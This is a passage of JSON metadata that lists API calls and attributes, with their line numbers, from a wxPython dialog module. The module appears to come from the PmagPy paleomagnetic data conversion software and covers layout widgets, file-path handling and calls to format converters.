"attribute"}, {"api_name": "wx.TOP", "line_number": 1337, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1338, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1338, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1339, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1339, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1340, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1340, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1341, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1341, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1342, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1342, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1343, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1343, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1344, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1344, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 1345, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 1345, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 1345, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1346, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1349, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1349, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 1364, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1371, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1371, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 1373, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1376, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1376, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_bin", "line_number": 1430, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1430, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1431, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1431, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1433, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1433, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_bin", "line_number": 1437, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1437, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1440, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1440, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1444, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1444, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_bin", "line_number": 1444, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1444, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1457, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1457, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1458, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1458, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_dir", "line_number": 1462, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1462, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 1465, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1465, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 1469, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1469, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1473, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1473, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_specimen_ocn", "line_number": 1476, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1476, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1480, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1480, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1484, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1484, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 1487, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1487, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 1490, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1490, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 1493, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1493, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1496, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 1496, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1498, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1498, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1499, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1499, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1500, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1500, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1501, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1501, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1502, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1502, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1503, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1503, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1504, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1504, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1505, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1505, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1506, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1506, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1507, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1507, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 1508, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 1508, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 1508, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1509, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1512, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1512, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 1527, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1534, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1534, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 1536, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1539, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1539, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_asc", "line_number": 1593, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1593, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1594, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1594, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1596, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1596, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_asc", "line_number": 1600, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1600, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1603, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1603, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1607, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1607, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_bin", "line_number": 1607, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1607, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1620, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1620, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1621, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1621, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 1624, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1624, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.experiment_type", "line_number": 1628, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1628, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 1635, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1635, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 1638, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1638, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1642, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1642, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1646, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1646, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 1649, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1649, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1653, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1653, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1657, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1657, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.mass_or_volume_buttons", "line_number": 1660, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1660, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 1663, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1663, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1666, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 1666, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1667, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1667, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1668, "usage_type": "attribute"}, {"api_name": "wx.RIGHT", "line_number": 1668, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1669, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1669, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1670, "usage_type": "attribute"}, {"api_name": "wx.RIGHT", "line_number": 1670, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1671, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1673, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1673, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1674, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1674, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1675, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1675, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1676, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1676, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1677, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1677, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1678, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1678, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1679, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1679, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1680, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1680, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1681, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1681, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1682, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1682, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 1684, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 1684, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 1684, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1685, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 1685, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1687, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1687, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 1699, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1703, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1703, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 1706, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1706, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1707, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1707, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1709, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1709, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1710, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1710, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1712, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1712, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1713, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1713, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1715, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1715, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1716, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1716, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1718, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1718, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1719, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1719, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic.ldeo", "line_number": 1760, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1760, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1762, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1762, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1764, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1764, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1767, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1767, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.ldeo", "line_number": 1767, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1767, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1779, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1779, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1780, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1780, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.radio_buttons", "line_number": 1784, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1784, "usage_type": "name"}, {"api_name": "wx.HORIZONTAL", "line_number": 1784, "usage_type": "attribute"}, {"api_name": "wx.EVT_RADIOBUTTON", "line_number": 1785, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_text", "line_number": 1793, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1793, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 1796, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1796, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 1799, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1799, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 1802, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1802, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1806, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1806, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1809, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1809, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 1812, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1812, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 1816, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1816, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1819, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 1819, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1822, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1822, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1823, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1823, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1824, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1824, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1825, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1825, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1826, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1826, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1827, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1827, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1828, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1828, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1829, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1829, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1830, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1830, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1835, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1845, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1845, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 1857, "usage_type": "call"}, {"api_name": "wx.BusyInfo", "line_number": 1858, "usage_type": "call"}, {"api_name": "wx.SafeYield", "line_number": 1859, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 1862, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1862, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1868, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1868, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_samples_csv", "line_number": 1892, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1892, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1897, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1897, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_srm_lore", "line_number": 1901, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1901, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 1908, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1908, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1908, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1909, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1909, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_dscr_lore", "line_number": 1911, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1911, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_jr6_lore", "line_number": 1917, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1917, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_kly4s_lore", "line_number": 1926, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1926, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1933, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1933, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1935, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1935, "usage_type": "name"}, {"api_name": "wx.BLACK", "line_number": 1946, "usage_type": "attribute"}, {"api_name": "wx.BLACK", "line_number": 1949, "usage_type": "attribute"}, {"api_name": "wx.BLACK", "line_number": 1960, "usage_type": "attribute"}, {"api_name": "wx.BLACK", "line_number": 1963, "usage_type": "attribute"}, {"api_name": "wx.BLACK", "line_number": 1968, "usage_type": "attribute"}, {"api_name": "wx.BLACK", "line_number": 1971, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 1979, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1979, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1985, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1985, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_srm_lore", "line_number": 1985, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1985, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1987, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1987, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_dscr_lore", "line_number": 1987, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1987, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1989, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1989, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_jr6_lore", "line_number": 1989, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1989, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1991, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1991, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_kly4s_lore", "line_number": 1991, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1991, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2002, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2002, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2003, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2003, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_dir", "line_number": 2006, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2006, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 2010, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2010, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 2015, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2015, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2020, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2020, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 2025, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2025, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 2028, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2028, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 2031, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2031, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2036, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2036, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 2039, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2039, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2042, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2042, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2045, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2045, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2046, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2046, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2047, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2047, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2048, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2048, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2049, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2049, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2050, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2050, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2051, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2051, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2052, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2052, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2053, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2053, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 2054, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2057, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2057, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 2070, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 2076, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2083, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2083, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2094, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2094, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.pmd", "line_number": 2129, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2129, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2131, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2131, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2134, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2134, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2141, "usage_type": "call"}, 